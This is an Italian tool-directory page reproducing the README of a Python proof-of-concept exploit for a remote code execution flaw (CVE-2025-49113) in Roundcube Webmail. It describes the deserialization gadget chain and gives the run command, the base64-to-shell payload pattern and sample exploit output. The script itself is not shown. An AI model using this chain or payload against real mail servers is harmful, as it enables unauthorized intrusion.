Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/00xcanelo/cve-2025-49113
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHub00xcanelo/cve-2025-49113

CVE-2025-49113

💥 Exploit Python per CVE-2025-49113 | Roundcube Webmail RCE tramite PHP Object Injection

Vedi Repository
861 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-49113 – Exploit RCE per Roundcube Webmail (PoC Python)

ID CVE: CVE-2025-49113
Tipo di Exploit: Remote Code Execution (tramite PHP Object Injection)
Applicazione: Roundcube Webmail ≤ 1.5.9 e ≤ 1.6.10
Linguaggio dell'Exploit: Python
Autore: 00xCanelo
Stato: Testato e funzionante su installazioni Roundcube vulnerabili


📌 Descrizione

Questo exploit sfrutta una vulnerabilità nel modo in cui Roundcube Webmail gestisce i nomi dei file immagine caricati, che vengono deserializzati come oggetti PHP. Creando un payload malevolo che attiva una catena di deserializzazione Crypt_GPG_Engine, è possibile ottenere l'esecuzione remota di comandi post-autenticazione.

Questo PoC Python replica la catena d'attacco utilizzata dall'exploit PHP pubblico, ma con una logica più pulita, logging opzionale e facilità d'uso in configurazioni di tooling offensivo.


🚧 Prerequisiti

  • Versione Roundcube vulnerabile (≤1.5.9 o ≤1.6.10)
  • Credenziali utente valide su Roundcube
  • Ambiente Python 3.x
  • pip install requests

🚀 Passaggi di Sfruttamento

root@kitploit:~
python3 CVE-2025-49113.py <target_url> <username> <password> <command>

Esempio:

root@kitploit:~
python3 CVE-2025-49113.py https://mail.target.htb/ [email protected] 'P@ssw0rd123' 'id'

🔐 Catena Vulnerabile

La classe PHP Crypt_GPG_Engine permette di impostare un campo _gpgconf, che viene poi passato all'esecuzione della shell.

Il nostro payload costruisce:

root@kitploit:~
echo "<base64-encoded-cmd>" | base64 -d | sh

in _gpgconf, che porta a RCE in seguito alla deserializzazione.


💣 Esempio di Output

root@kitploit:~
[*] Starting CVE-2025-49113 exploit...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10606
[+] Target is vulnerable!
[*] Logging in...
[+] Login successful.
[*] Uploading serialized gadget as image filename...
[+] Gadget uploaded successfully!

📁 Struttura dei File

root@kitploit:~
.
├── CVE-2025-49113.py     # Script PoC Python
└── README.md             # Questa documentazione

⚠️ Disclaimer

Questo codice è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati. L'uso improprio di questo strumento è rigorosamente vietato. L'autore non è responsabile per eventuali danni causati.


🧠 Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2025-49113
  • https://github.com/roundcube/roundcubemail/issues/9312
  • https://huntr.dev/bounties/f8e2a8e6-d1d7-44e1-93e1-367861c97a82/
Scarica lo strumento